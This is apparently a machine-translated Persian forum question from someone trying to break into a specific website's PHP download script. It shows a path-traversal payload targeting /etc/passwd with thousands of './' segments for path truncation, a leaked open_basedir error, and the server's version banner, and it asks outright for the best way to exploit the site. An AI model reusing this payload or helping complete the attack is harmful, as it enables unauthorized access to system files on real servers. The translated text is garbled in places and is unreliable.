من یک وب سایت با یک فایل download.php پیدا کردم که می تواند مقادیر مختلفی را در پارامتر url دریافت کند (به عنوان مثال www.example.com/download.php؟url = ارزش ). هنگامی که من ../../ را به عنوان یک مقدار برای url می نویسید، خطا در این صفحه من را در صفحه می اندازد:
هشدار: realpath () [function.realpath]: open_basedir محدودیت در
اثر فایل (/ srv) در مسیر (های) مجاز نیست:
(.: / srv / www / example.com /: / tmp /: / usr / local / php526 / lib / php /)
در /srv/www/example.com/download.php در خط 5
آسیب پذیری های PHP realpath () را در PHP 5.26 یا پایین جستجو کردم و در این مقاله یک مقاله درباره سیستم مدیریت پرونده پی اچ پی و حملات با استفاده از این روش پیدا کردم [19659004] من میخواهم به عنوان یک فایل به پوشه / etc / passwd / دسترسی پیدا کنم تا بتوانم اطلاعات بیشتری کسب کنم.
من سعی کردم با استفاده از یک URL که طولانی تر از 4096 بایت است، اما به نظر نمی رسد که کوتاه شود و هیچ اتفاقی نمی افتد.
www.example.com/download.php؟url = .. / .. / etc / passwd /./././././././././././. /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ././././././././././././././././././././././././ ./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././././././././././././././ ./ /./././././././././././.....<...>.php
curl -head website.com بازگشت
HTTP / 1.1 200 OK
تاریخ: Mon، Jul 30، 2018 11:39:01 GMT
سرور: آپاچی / 2.2.23 (یونیکس) mod_ssl / 2.2.23 OpenSSL / 0.9.8h
نوع محتوا: text / html
چگونه می توانم با استفاده از LFI یا Path Truncation از وبسایت استفاده کنم؟ یا بهترین روش برای استفاده از این خطا چیست؟
